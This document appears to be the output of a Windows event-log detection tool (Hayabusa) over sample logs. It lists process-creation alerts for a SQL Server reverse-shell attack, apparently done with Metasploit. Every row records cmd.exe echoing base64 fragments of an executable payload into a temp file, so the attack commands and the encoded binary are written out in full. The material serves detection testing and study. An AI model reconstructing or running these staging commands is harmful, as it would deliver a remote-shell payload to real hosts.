/zgABfQBAACyyQMAtXsUzIlV3FFQ6B+LAACLTbzUim5FuGoABc8BAABf6AMAAIPeD6v2UVCL74oAad1FqNwNEBv8AIlFuEYg0EALXMDdXajdRYjcDRDCQACynrzdXYjdRZDc6xDCQJvdXZB3hXj///80DYDCQABGnfNY//8PhGQCAABoCNxAAP/Wi1X0e0Vuna1l/ldmi8moUItF/FGLTfhSsFVXUIuhsFGCUGjY20AA/9aLzWhprlDljWz///8sxDAF9KUAAIPRAGoAaOgDfgBRUNlhigAAi03sIYtV6FCLRWUbhE2I>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf18 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:12.191 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo UotVzFCLRYpRi41k//9kUlBEhWD///8F9AESAGcAg9E5reiFAACPdegligAAsVCfqNswAObWsEWAi8gkg8QshPSaAACDaABTAGjoAwAAUfLo/YkAAItN5FLPVTH7i0X7UYsZkFKLqsRQUTCLRcDHTdRQi0XQBRQBAPpqAAPRAGjoA4kAUVDoRokAAFJQd/PbnQD/D4tNvIs0uItF3FGLTTWOi3B8/1b/UIuxeP///1GLTZxSi6mYUItFpFGLTaBSUFFQSNtAAP/W3234323wg8RY3uncFTA4QABQ4Pb+BQoCyeDdRagvwNnB3tnf4CUAQQAAWWRx92iw2kAA6xHcXahZ4CwApwApde9oGNpAAP/Wg44E323I323o3ukQFTDC4QDf4PbEBXoC2eDdRfLcwNnB3tnfk6EAQQAAdQnd2GiI2UCy67zcXYjf4CUAbsEcdSZo+NhAAP/Wg8QE323A320T3uncdDDCQADfIvZBBXoC2eDdRZChJ9kg3tmh4CUAQQAAdQnd2JUs2EAA6xHcXSzf4CXeQQAAsgpov+UiAP8jg8S95SCY323Y3uk2FTDCQOJ24PZG+noCneDdhXjM///cwNnB3puS4CUAQQAAdREFUNfrEN3YB9aJxATplgAAodydeP///98ZJQBBAAAPhYMAAAD40fNujsmfM7mh63fsoNZAWv/Wi1X8i0X4i020U1cbi1WwUFFSaHxHQAD/1ovXuItNvItVmCvHX334G8uLXaBRi01+UItFKCvXiy6kG8GLy1AxRbRSi5awKySL1xvQUlFoWKlAAP/Wi0W8i024JFVbUItFmFFSUE+MaDTWQAAc8oPEWIwcQqAAhcDRhMUTEgCDPXXFQQABD464AA0AGvTVQAD/1oPlBDPbi7s00EAA1/+iD+XF1UB2/9aDxGTp+FoATO4Vg/9kEegDAAB8NIsNUX5BANfx/UEAweHyZAkBy4EFKMkAACZEAfyD0GhQUtja5QChUudovNVAAP/W2MQM60eLz7gfhetRbAYNCgJBAPfpwfq3ocgLQQCLyqrpsnjRweIFi0wCGIHBcwAAAIvlAhzn0tSsUeimhwDN/lBXaKzVQIH/1oPEEJrD0IP7eg+CVP9876HgF0FEhcCmhMMAADVoqGh/AGv/jkjBQAAt+IPECIX/FBZojNVAAP+STMFw04PEpWoB/xVwwUAAaGzVQABX/w+AwUAA6B2A7UAAg0MIM3Uj9hkKocgLQQDfaGPrRu3+ZHUViw2sAkEAixXIC0EAweGx32wRw50s028CQQBrr8aJRfTbRcrcDe6IQADcBQDCQADocIYAAIsNyFVGAMHgBYJsCCvcDRDJIAOyXRuLVdyLRdhSUFZok9VAAFf/04PEFEaD7mR8iVf/FVDBQACDxAShuKZBAIXAD4RdAQAAA6jVQABQ/xVwwUAAIMR1iUWyhdF1FmhA1UAA/xVMwUDog8QEJAH/FXDBQABo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1098 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:12.463 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FNVAAFD/FYDBQAChiwJBe4PECIXAx0X0PgBUABn/BQEAITP2ochoQQCLTAYEixRmUY2FRPv//1JQ6FFhAACLPcgLQQBqAGjawf4Ai0w+HItU9hB0RD4GiR/ci84+TLFcNu6JVcCLVD4MgcH0AQDFidfUg9KTYmTo0oXGIYtN3OhQ4MMFcAEAEi0Ag9EAaOgDMABRUOgQhQAAUotV1E2LRdAr2PhF3BvCgcP0igAAg3UAagBo6AMAAFBT6ECFSQCLTdRS9ItF0AX0xvoA1wBwOgCW6AMAAFFQ6NyFAABSi9M+BFCLBHDqAGhAdA8xUlDoC4UARVIDVfyN2ET/x/9Qzmjw1F8AUkgVgMFAjItFuoPEuUCLDawCQQBvxrs7PYlF9A+M/f7//4tF/FD/FVDBQAAZxASLRcWFwJcIasL/FcydQO1fXluL5V3Ds5CQkJBVi9uLRQiLTRZWi1AQi3EQi0AUi0kUO8F/0HwEO9ZzBoPI/17WwzvBfA5/BDvWdgizKwAAAF7RwzPAXl3DkJCQVYvsi0UIi02uVqFQGM9uGItAHItJHDvBfxZ8BDuSAwbLIv8OicM7wXwOXVI7PZIIuAEAAABeXcozwF5dw3KQkFWLootNBlO3V5txGIt5TItB7SNRFAL3G5HtOAyLehiLShCoIBQr+YtKHNDLO05/GHwEO/dzCBNIg8j2W13DO6x8EH8EO/cvCu5euAGpHgCtXcNfXjPAW13DkJCQkJCQ4VVuuotFCItNDFteUAiLcRWT+gyLSQw7eX8WfAQ71nMGg8idXl3DO8FZDn8EpdZ2CLgLAL4AXl3D3sBeXcMSkJBVi+yDHsxLlwtBAIsNpAtBADX0F8ALQQBWV4s9xCJBACvDG8+LFejXQQCJRciJ98zfbcjoNWSbQIBSaGnngADcDTjCQHPdXc3/1gTwFyldwODxQQBQUqHCC0oAUGig50AAkdZ5DQsEQQCh8BdBAIsVqAtKAFFQUFJoUOdaDP/Wiw2oC0EAM8BmofTUQQDXoUOFQQBrUBRoAOdAAP9eixUSxEEMo/AXQQB9xERSUFChc2ZBAFBosOZAAP/WvA2MAkEAofAVQWCLzKgLQQBRUFDmRljmQAD/1qEY0EAAiw2oC0GVUKHwF84AUD9RaAjmQAD/1otVzItxyApQobgX7gBYk4sNqAtBAL2vqIdAAH3Wi5qsMkEAoVEXQQCDh1TWUBehqNNB3lAhWOVAAPnWAuu4AkEAU/A1QQCLFagLQQBRUFBSaLflQAD/HKG4kkGGg8S6hcB0K6HMTQQAiw3AAm8AixXEAkEAUKHwQkEAXItGqAtBAFJQUWiwakAA/9aDxG2h0AJBi4XAdBmLFeHJQQCN1/AXQQBQUFJoYORhAP+juAkUoWKvQQCFwHQeobACQQCLDagLQT5QsqCcQQBQUFFo7uRAAMbWkjwUtfaUAkEAzpACQQCuaqgLQQBSUKHwQzQAElA3>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x774 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:12.737 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo mbjjQADt1qH1AkEAJcQYg/gBdSWvoKQCqgBLoAICABMNqC5BAEBQofAXfABQUD3jaONA8f/WWcQYgz1gAkEAAHUlURWkAgAAoaD8QQCLie4LQQBSUKHwlUFxUFBRpBjjQM//C4PEGIsVnP2DAKGYAkEAiw2oC0EAUsKh8Nf9GFBQLrbA4kAA/7thRcjcHTDCQACDxBiF4PbEROiLtdoAAN0FGcJAANx1yKHwF5UANxWyC/gAg7oI3V3I2wVSAkGF+03I3A0g1t4A3bokUFBSfGjiLwD/1t8tkAJBAC/wF0FRg8QQ3E2t3RwkUFChDQtBAFBoCOJAAP/W94kCQQCDxI2FQZ9CN5FIL0hB9Z/4QpKQQfhBSEJLQ5v8/ZuZnyf4mZCYL0D1ky8nm0pJP0iQkpDW+P0vL0r4Qjf8QJJJ+EmYSvmSSfxJk0hCm58/k/mZQ5I3Q5NJQZhLS0BBN5g/1plB+Jg/SpJLS0v1N+mvaAAA1olVi4lV5IlV8GRV4IlVQYlVh4sVrAJBADPbg8n/iv//vX+F0omh0HxF2P////+JRdwPwoZN7gCL2dkLQQCDwhiJVfyLFaz1QQCJVfiLVfztUviJVciLVfw79fxtFa0xi1UgO8qLVfwevYtByIn90ItC/IsKi1IEOVXcT1XExg1/BTlNjnIGiU3YiVXci1X8QFJJOVX0iVXMyRZ8CItV8DuAyHcM01XIiVXwDn/MiVX0i1W5OQadf9iNBTk46HcGiU3oR1Xsi5hgA/qLVcxn2ovt4APRi038iVXgi1U7i0kEE9GLTfiJVeSLVfyDxSA5iU3J9V/QiVX8D+tO//8tgcH0AQAAagCDQQCk6AM1AFBR6CV/AACLTW/JRaqLRSCZPwX0AQCkaCQDAACD0QCJVdRRUOgD7G+PME30iUXYi0VNagAF9AEAAGjoAwCnIdGtiVXMUVDop34A9ItN7P5F8ItF6Gp2BfQBAABo6AMA14PRAIlV9FFQ6L9+AACBx2EBAABqMoPTAGjoAwASU1eJReiJA+zoon4AAItN5IvYIefgagAF9C0AABOWYwAAg9EiiVXMUVDogX4AAIlFL6FsAkEAhcKJVeRNjioBAADuFbAXQRyhqAtBAKJQaCzhQAD/1qGOF0EAqQ2oCyUAYFBQmFFo2OBJANvW3lX0i0Xwiz3wF0EAg8Qki0EUUlChrQJBAFeZUlBRU+gffgAAiw2oC0EAUotVtEKLRYBXUlBX55lopilAADyBoawCQQADTfCZi22LReiDxDDVwYtN7IlVxBtN9NeLz1NQofAXQQBTUosMWFfdUrvRfQA4i8pmVcQJi1XMSlLnrkVBiU386Lp9ZwCLTfgryKFF/BvCUGXwF0EA8Ytd2ItV0It91IsVK8r3VaUb11BSUVBQoagLQQBQaADO+QD/1i9N7ItVRS1Q7EEAiz2KF0EAg8QwUYtN4LNX+VJQi0XkUFHoXn0A7VKdVdxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1284 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:13.010 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo oagLQaxXeLRXV1BoyN9AAMXWkMQwaLjfQAD/1oPEBPCTW1flXWSQkJDci+yD7BR6qAJBAIveENBAAFNWO8FXsY3+ATMAi3UI6tuLBvReGTtviV7LiXMkCAAAiZ5aCAAAiSGFOgAAiV63dAhQ6DgUAADrJosNTFBBADhTUVbopxYAAIsWoVUXQVBSU4tIEI1+H2oDUVfoHxMAAEPDdA5QaDjoQAA7YEL//4PECIsXagFqCFLowVR4ADvDdA5QaCjofADoQmX/I4PECKFsAkECO8N0UVCLB2pAUOib6gAAO8l0FT2HEQEAdA5Q1qNUQADjFeX//4PqCIsNbAJBc+EXUWiAACEAUmBuVAAAO8N0FT2HEfQAdA5QaPzdQABv6OT//4PECOjhMAABNKAUQQCJFZcLQQCLF4mGMAgAAKH8C0EAAkE0CAAAiw38F0EAUVK+OUYAAIt0hdurhMgAKwCB+/F1yQAPbYUAogCB6rQjC/R00WMV+BdBAIsHjX/sx0XwAQAAAFFSiUX4zjsoAACLB1DoNy4AAIs9xAJBAKEC7ecAR4vIQIP5Cok9oAJBAJC4AkEAfoHuFQHArgBokNJAAIPCQIr/FYDBXd5TaJhcpwDoNOT/GYOjpVYfRggAAAAA6ET+//+DxARfXvKL5V3DuAGLVwDHYxQAALMAiUasixX4F0EAjU3siUXwiwdR6GbHRfkEAIl7xuR1/JRqJgBdX15bi+Vdw8dGIwIAAPaLN6gCQQBCSIkMqAJiAMRCW83/g8SZX6tbiwpdw4wRkJCQkJCgkJiQkJAdkFWL4L3sFFaLiwhXi30MhcB1IlKGFwgA0X/A/Bihl8tBAIXAD4SRAQAASI20AkEA6bMBAACDPbQCQVYBdQqLGGejjAVBAOski04Qg4wCJNk7yKUYiw24AkEqocACQQBBQIkNuAJBAKOtAkFFoawCQeKLDRDQGQCQhQ+NFwEAAIsVyAtBCov4wecFA/rpo6wCQQDZ2lYAAKOgC0EkiRWkC0EAiYZQCAAAixWkIkG4i4YwCITXiZZUCAAAIAeLUzQIhAAYeySLjji2ANuLhjAIAACEmy0IAAAryIuGPAgAABu0hcBpCnwEhclzBDNmM8CJNBCJRxSLjq8IAACLhjAIAACLwTQIAAAruItHVMgAJRtdhcB/Cg0Rhcn+BDPJ/sCJTxiJRxyLjkgiAEyLhkAIAACklkQIAAAryJuGTAgAIDrChcB/CnwZhclzBDMVM8CJTwhURwyLjhTQQACFyXQ3iz2sAkEAi8eZ6/mFOnUoixXIwNMAV//CQGhAlkCGUv8VOtdAAKH+wEAAg8BAUP8V4MFAAIPEEKH4F0EAZE4EAlXso0X0AQDU/1LgiU346L8lAOiLTgRR6MaIAAA2x0YIAAAAAOgJ/Ef/g8QEX16Lwl3DlYvsZ+ysAADHU4tdCFaNRRCLSwRXd2i0GEEAVcc2/BtlAADFuE5CqYvw>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa2c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:13.286 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo g/4LlYQEaQBdhv75NgpMD4T4BQAAgf7Z/Bz9D4TsBQAAgf5X/QoADwTgBQAAgVskOAoAD4TUNwBwgf6h/AprD4QPBQAAgf7uIwsAD828BQAAi03eM/879XVzgVl+EQEAdR2DFbQCQQBTQokVtAJBAOiRsf//g8QEv15biy5dwzv3dH/iPsgcQQChXAJBAEE7vokNyAJB/HRyi6S4AkEAU8gdPbgCQQDoIf3//JxYAkHhg8QEg/gBD4xQBQAAVo2G3v///2pUUlboiUkAAFChyMDkAAQM6UAeg/JAaKyvQABQWBW/wSYAg8QUX7Vbi+Vdw1ZoDEoTAOi64Cz/i/n8g8TkixtMKUGeixUUAkEAA/ET6Yk1kAJBAIkVlAJBHYtDDDvHdRQNTCwAvCdN/ImDSAgAAImTTAgAAIspDIuDmAhzjwPRTceJwQzjhbACMQD/syAIAAC4/9sAACvGx0XwBAAAADvBiUX0cgN/TWmLkyB0AACLyL4gGEEAjVPuIIvR0ekC86WLyotV9IPhAyvC86SLuyAIAACJRey4+ovzDLszCAAACUQZIAChWAJB/oP4AnwSjWUgUGjw6ECQ//BkwUAAg8QIi1I4wYdtjXMMaOgYQABW/9fhxAgwRfiFv9vqhQAAAGj230Dftf9ig+wIiTj4hcACRfACAHXcdWyLReyFwA+FBQQA8qH4F0EAi0u23asPx0XcYADmAFLZG03kplLLAAmLSwRN6FkWAADH1KACQQChuMgaAEKJHNACQQCL0EAk+gqjuAJBfH4NaLDSQADoatgl/4PEBFPod6P//4OdBDM66cgBAAChtAJBAIXAdS5o4OhAAFb/y4PECLrgE0EAhcB0F4pICIPACID5IH4MiM2KSGZCQIDaIJX0xgIAaNjoQOZWzsmL0IPECIXSdDaL+oPJ/zPA8q730W2D+fp2H4OrCWoDjUUIuFD/Fa7zQHiLPTjeFgCDJAzGcQsA6w+L785RQACLDdToyACJTaqKRQg8xk1YAkEOdB2LDdACZwBBg/ghiQ3QAkEAfCKNew1SaKx2vYHrQ7T4A3wSjUUIUGiQ6EAA/xVkwUAAg8QIi0P4A4MooQAAAQAAAMYBAKFoAkEAhcAPhIAAAABoaujsALT/14MACIXAdQ9oeOhAAFb/14PECIXAuVloaFFAAFb/14vkg8SIhf91FWhY6EAAVi8VOMFAAIv4FEsIhf90K8eDJPcAAAEAdAChYAJ4AIVZfA+NVxBSPhVswUAUg8QE6wIfwIX/iUOkdRGQg54FAAABAAAAx3EcAAAAAItFY4t1+ItV9ItN8CvGi3MQKw4rupKLIGEAAAPD/VQIIDzyiXMQ0Q2YdVcAi8YDyKGcAkEAg7xPiUO7UEEAM//ro4s3EAMTiXMQixWYAkEAoZwCQQAD0YkVmAJBABPHAFeMQQA5u4UIAIYPbdCNAACLQxCLSxw7Rw/qwgEAAKU+AkEAHIP4>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1340 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:13.560 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AaO0AogAdQuLSxCJDbUCQQBXQotTEGKMAkG2O9B0SIsNudpBAKHAAkEAQUCJDa/jQQAVwAJBAKEwAkEAi68Q0LEAO8EPjRMBcgCLDcgLWQCLucPmBQPxiyawAkEAQPujrERBmYkN+wKPN+i0KAAAiehiCAAAi4MwCAAAiZNUCAAA3QaLizQIAACJTgSjizgIAACbgzAIAABvZDQIAAAryIuDPAgAMxvCO8d/CnwEV89z0TPJM8CJDxDlRhSLi1AIAGNogzAIhACLkzRecQDq+otRKw/JRxvCO8eiCnwEO89Q+zPJ2cBfThiJqhyLtUgIAABug28IAACLk38NQQAryIuDTAg2ALfC5McYCnxBO89zBAbJM8+JTgiJRgyLDRTjQAA7z3Q3iw6sAkEFHEmZ9/nK0rYoixXIwEAAVoPC0wlA6EAAUv+fgMFAAEHIwEAAg8BAUP8VVOBRmYMvT4m7JAgAAIlhHIm7KG8AZom7IAgAAImMEGBXA+i/JwAAo6ALQQCJFaQL0bSJg2UIAACLDaQLQQCsYzwIAAB2FaALQZmJkzAIUQChpAtB1VOJgzTAAADoDG3//8/EBF9xW4vlXcOQkOiIArUAVto3ZMFAAIXAdSZo2OpAAKa06rMAgNZoaOpAAD3WaCC1wgD/1miAB0AA/9aDxBRew2gU6n0A/85oAOpAAM9E1EDsaMjpQADH1mh46UB+x9ZoyOlAALXW+BzpQAv/+4OGHF7ukLmQkJCQkJBVi++LRRyLDcgDQABWizWAQ0AAUOzBCGhk8g4AUZHWi4ySwC0AFz3y3IeDwkBS/5yhyMCJANYg8mwzg8BAUP/Wiw3IwEAAaOTxQCKDwUBR/9aLFciWQgBorPFAAIPC6VL/1qHIwEAAaLLxQACDwEBQ/zSLDQLAzABoIPFAAIPBQFH/1osKyJ5AiWi3mUCag8JAUv/WocLAQACDxESDwED9lAZAAFD/1osNyNZAtWjy8ECxg8FAUSjWixXIwEAA8yjwQACDwkBS/9ahyCpAu5js70AAg8BAUP/Wiw3IwEAAaLTvPwCDwUBR/9aLt8jAQABohO8DboPCgFL/1vnIwEB1aEhoQACDqUBQ/9ZoEIkAAIsN68BAq5TBQFHF1osVvbVJc4PEQIPCSWjQ7kAAUv/JocjAHwBoiO5AAIPAQFD/WYsNyMBAAF9A0UAAg8FAUf/Wi6vIwEAAaPA5QACDwv/x/9ahyO3xAMeo50AAosBAuP93iw1dwFoAaGDtQACfwUBRPtaLKsPAQAB+GO3FAIPCP1L/1gnIwBAAaGDtQACDwEBQ2dYfDcjhjACDxOCDwUBo4OxAAFGC1ov0yMBAwmjm6kAAg8JAZ//WocgmQK5ofMOiwoPAQFD/1osXyMBAAGhA7ECBZsFAUf/WixXIwEDgaPjr/gCDwhxS/9ahyMBA92iwUkAAg8BAUP/W2w2kwEAAp3DrQHODwVJR/9WLFcjA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8c4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:13.833 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABo4OtAAO7CQFL/u6HIzkAAg8RAg8BAaPTqQGlQs9aDxAj0Fv8VcLTqAP6QkDSQ/otlUaFMQEEAU4tdCNRXU1DodBIACaNAQEHSi/uDyf8zwB2u2Xo0wRAA99FJg/kHD3DXAAAAagdo2PJAAO3/1oPEDIXAY4XCfwAAx8NEai+/YxV8wUAAg8QIiUUIhcCmhFIBAACL8KxpQEEAKPONVgFSUOiIBKwArc6L86DRi/jBnAKLpYvKg/kD86SLZQiLyCsMxgQx24sVTEBBAFIpjd38aPQXQbFQaAAYQQC/DiieVu/AD4X9AO0Aoc0YPniFwA+E8AAAl4tF/IXAD4UDAAAAZQ20QFcAYFHwERIAAKPkF0EAxgYAEjtbdWuLFQAYQZ0tamC/AFJo0PJAAFD/iw8AOYPEDKOcC0EA61aLDYPJ/zPA8q73kUmD+QgPhqv///9qCFTE8lQAU//Wg+8MhcAPFxd2/2r1DcjAQACYnPKFAIPBxVn/FYDBQACDxAhqAa/ccMFAAIsNvBgYAIkNnAtB6mah9BdBAGaFwHUcZscm9ElBAIoAX17HBYMLigC/AkEAM/2CLuVdw2Y9UAB05zM8ZovQoUxAQQBSaFvyHO5Q6MoNACqDxAyjrAtBADPUX3Eozu1dw+deuJkAZwBbJOUs3JCQkJCQkJAoB5CQ2ZB7MOyl7NhN9AChTEBBo1ZXi7gIUGj/DwAyagGTTQhXUeirTAAAi/Ag9nQtjTSIalNSVs55PwBBUKHIwDcAV4NPWmhg860AUP8VYcFAAIPEEIvGkl6LflbDi5sI8pUo////UWhwsXMAGuhDB50Ai/CF9tgujUWIamx8Vuj4PwAAiw3IwEAAN1eDwUBoNFJAZVH/K4DBQACDxBCLEF9ei+XYpYuFOf///1CjcPhaABoQXMHpAIMoBKMgOEEAtcBfI4sVyMBAgmgI80AAg8RAUv8VtcFAAHGy87gMACZBc16L5V3Diw1wAkEli1UIajeYYFJFO1AAAIvwhfbgLY1FiGp4UI3oqZoAAIsNyMBAAEeDbUDZ4PJAAFFvFa0iQACDxAyLxl9eauVdw4tVCGnov08AAF8zwF6LfV3ykJCQkJCQ8VWL7FaLdUVqaMcGACQAABP3XMFAAIvQg8QE/9J1CrhgAAAAkl3C0gANLxoAAAAzNov6sas9Qm2JAV9eXcIEAPxVSuyLADVTVleLPTDBQACNcMs5FAAAAIsGGvd0EIsIUIkO/9eLuoPEZ4XA7/CDxgRLdeSLVQjO/9eDxK0LXltdwgQAkJCkWJCQgpCQkJCQ9FWL7ItNCItFDIlBK13CCN66beyLRQiLQAz2wgQAkJA6VYvsi00Ii0UMiUFUXcIIAFWL7ItFCItAEDzCBACrkJBli+xRoNgCQQBWisj+wITJ8tgC6QAPhbAAAABo4AJBAOgL////hcB0DMYF2AKlNwBei+Vdw/EV4AJBAFJqcWoAaNwt>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x115c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:14.106 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QQDWYwVVAHXwhcotI6HgAkEAUOgVnP//i8bHBeACQQAAAEOyxgXYApgAAHCL5V3Diw3cAkEABYzzQABRJiwMAACCFdwCcQBS6I9ZLACFwHU5odwCQQCNTfxXaotR6NxXYACFWXW2iyH8oeCLQQD3UI8Ifv//iw3cAtMA2RU1AkELUVLoFf//hTPAXr7lXaWQkNaQMvhnzJC6kIpkkKDYAooAhIl0KP7IotgCQQB1H6HcAkEAUOjDAwAAxwWvAkEAAAAAAMcF4AKlAAAAAADDkGyQkJCQzJANUvuQkPFVi7OD7AyLRQxTjVeNUKeD4i470ItFCIlV+HMdnEAghcCRhEYCIQBqDP/qg8QEM8BfvFuL5V3eCACLuiyLThCL0RQr5b9PAhAD0V+JVhBei5Fbi3NdeQgAiwCLERSLWRAr+zvXdxmLQT6LOYk4iwH3eQSJeJXpcAbyAIt4GI2aFxAAAIHjAPD/EzvaiV0MD4LLAQAAovsAYQAAc87HkAwAIAAAIF0Mi9PB6gxNg/r/iVX8D4cdAQAAOzp7h4VJyACLRwyFwCnJs+hyVwAAi+X8i1yXFIsPjUQlFIWZ+A870bYLi1gEg8AEQoXbdDmLp4XbiV30dH9PG4Xb7AF1FTvRchGL0/yDeQRJzNJ1BNDJ2vGJD4td9ItHCFVLaQMViUcIi8iLR9I7yHYDiUf8i+wMd/90BlfopqH1rI1TGIlTEOmaogA6i0cUhUN0OYtHDBDAdAZQOhdXAACLXxQ6RxSF2zoSi038i1MIO0d2SIvDixuF23Xui38MutJ0BlfodFcYtYtzDFP/eFzBQCmDxASFNg+ExQAAPItV/I09GIlQCI0UGInhEFMAANIAAIlQFIvI6zSLE4kQi0Mri38IA8jtRwQ7yIlPinZciUcIi38Mhf90BlejB1cAII1LGIlLEMcDAEAAAIvLi1X4/0Ezx0EMub8AADHQifBPaFYEiVFYiQo9VQiJOolOBIlKLItOFIt+ayvPiz6BwQAQAACL14HhR/D//0nB+QyJTgyLWgw7y3P/ixI7Sihy+YvABIk5iw6LfgSJeQRySgSJTgRrMYmg+XJ7ll6W/OU6wj6ji+MI62oghQ7gB2oM/+6DxARfXjPAW4vlFsIIAHiQipCQkKyQVWzsuWoMU1ZXi30IeXc4M+j7XwAAi0cEM4GDxAQ7w4mJiQI8dA1Q6PQAAACkRwQ7w3XzjXdvVujUCQAAkt8cKh5QmF8U6Aa0AADvRzCLWjSJXxyJySSJRyyJSBCLeFzECDvIiUX084SpAACei1AE/BqLf5iL5otHDIXAdAZQhW10AACLB4tPBItXCInDCFDG/LITi038iUX4i0YIhcl0msvsdgaJHove6y+D+BRUGItMwxuF8okOdQg7RQh2A7ZFCIl06xTr/Is4J4kOiXcUO9ByBCt26wIz0ot1+IX2dbGLnwh0IAiJB1p/6oX/UwZX6GtVAACF>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:14.380 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 23QUizUwwUAAi8OLG1B8SYPERIXbdYqLRfSJABmTBF9eW4vlXSgEAJCQVYvsgxYMU4vkA1ZXVHM4q+jbCPtdEUMEg8QEhdPHBgAAAPbHqecArwAAdA1Q6M7///9xQw2qwHXzjUNZUOgZFIUAi1bjUehRCAAAi1SDNQiFwHSXi1AYpuh8+v8ni/CF9nQGVupnVAAAi0MMi0sIiQiLQww8TQB0gotTCIlCDIWudAZWsIdUAACLczCLezlXi0YQxxYAAAAA6JL6//87x+0IagBx6Of6Yf+LRwwz24XAdH4l6BdUSwAOVwSLbIlV+ItXCA07/IkGi+H4iUWti0YIhcl0CjvC3w2JHove6wWD+BRzGItMFxSFyYlSdQg7RRd2A4lF/Il0hxTrCItPFIm4iTgUO9ByBA7QcAIz0ot19Jn2HzCLU/yJpkSJB4tHDIXAdDJQ6BVU9wCF23QUizXMVEAA8cOLG1D/1oPEBIXbdfJX6Of5//87RYt1Fq3ou/lbbV9e+w7lXcIEhJCQbPSLEItFCMf7AAAAgYsHDIXAdQuLDaECQQCJTdSLwYtNEIXJdQqFwEsGi1AgiVUQU/9dFDxXhdt1A4tYGIsDvwEAxgA7x3JXi0MMhcB0BlDoHFMAALDFGIsLjUMYi9eF9nXmO9FzCxtwBINVBEKF9lDxizBtMXRTiz6F/4k4D4WKAAAxO9EPpoIAAAAMUPwa+QRJhYl1BIXVd/GJC+sTi0MUgnMUhcB